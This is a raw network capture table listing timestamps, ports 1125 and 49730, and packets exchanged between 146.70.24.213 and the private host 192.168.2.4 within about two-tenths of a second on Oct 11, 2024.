Oct 11, 2024 16:53:47.332273006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332282066 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.332304955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332336903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332348108 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.332370043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332403898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332412958 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.332437992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332469940 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332484007 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.332500935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332518101 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332549095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332562923 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.332582951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332593918 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.332665920 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332700968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332712889 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.332735062 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332772017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332778931 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.332801104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332844973 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.418204069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418278933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418298006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418306112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418387890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418402910 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418423891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418437958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418452024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418452978 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.418467999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418483973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418488979 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.418513060 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.418589115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418603897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418617964 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418632030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418633938 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.418647051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418657064 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.418661118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418684006 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.418692112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418705940 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418720007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418740988 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418749094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418756962 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.418761969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418776989 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418790102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418802977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418806076 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.418817997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.418831110 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.418852091 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.420165062 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420186996 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420207977 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.420211077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420226097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420241117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420257092 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420272112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420280933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420283079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420294046 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.420294046 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.420331001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420331001 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.420344114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420351982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420394897 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.420402050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420417070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420430899 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420444965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420447111 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.420459032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420474052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420476913 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.420489073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420502901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420516968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420519114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420522928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420531034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420567036 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.420567036 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.420589924 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.420831919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420846939 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420860052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420872927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420883894 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.420887947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420890093 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.420902967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420917034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420928001 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.420932055 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420950890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420964956 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420964956 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.420979977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420994043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.420994997 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421010017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421020031 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421051979 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421088934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421103001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421117067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421129942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421144009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421149969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421156883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421178102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421180964 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421191931 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421204090 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421206951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421221018 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421233892 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421248913 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421258926 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421258926 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421258926 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421264887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421331882 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421345949 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421360016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421396017 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421396017 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421420097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421442986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421457052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421463013 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421471119 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421484947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421494961 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421498060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421513081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421525002 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421528101 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421541929 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421544075 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421566963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421582937 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421587944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421603918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421617985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421627045 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421632051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421647072 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421653986 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421660900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421674967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421678066 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421713114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421719074 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421729088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421745062 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421762943 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.421839952 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.421899080 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.422020912 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.422034025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.422077894 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.422207117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.422228098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.422243118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.422256947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.422264099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.422271967 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.422276974 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.422291040 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.422322035 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.422338009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.422359943 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.422379971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.422393084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.422395945 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.422408104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.422421932 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.422430038 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.422435045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.422456026 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.476852894 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.508769035 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.508790016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.508805037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.508883953 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.508888960 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.508907080 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.508929014 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.508930922 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.508946896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.508963108 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.508969069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.508976936 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.508999109 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.509001017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509016991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509032011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509037971 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.509047031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509062052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509072065 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.509099960 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.509619951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509634972 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509658098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509671926 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509677887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.509696007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509711027 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509712934 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.509727001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509742022 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509742975 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.509757042 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509772062 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509779930 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.509803057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509808064 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.509819031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509835005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509849072 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.509855032 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.509886980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.510842085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.510857105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.510870934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.510905981 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.512969971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.512986898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513000965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513024092 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513025999 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513041019 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513046980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513057947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513072968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513078928 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513115883 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513164043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513179064 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513194084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513209105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513216019 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513225079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513240099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513256073 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513263941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513279915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513286114 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513297081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513314962 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513391018 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513406038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513421059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513422966 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513437033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513451099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513458967 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513464928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513479948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513489008 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513494015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513514996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513551950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513566971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513582945 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513591051 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513598919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513614893 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513619900 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513633013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513648987 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513650894 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513665915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513680935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513690948 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513703108 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513712883 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513717890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513732910 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513752937 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513756037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513772964 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513787031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513792038 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513802052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513816118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513825893 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513833046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513847113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513854027 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513861895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513878107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513883114 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513894081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513909101 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513912916 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513925076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513938904 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513942003 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.513953924 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513969898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.513987064 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.514008045 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.514118910 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514133930 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514147997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514161110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514175892 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514175892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.514193058 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.514200926 CEST	49730	1125	192.168.2.4	146.70.24.213
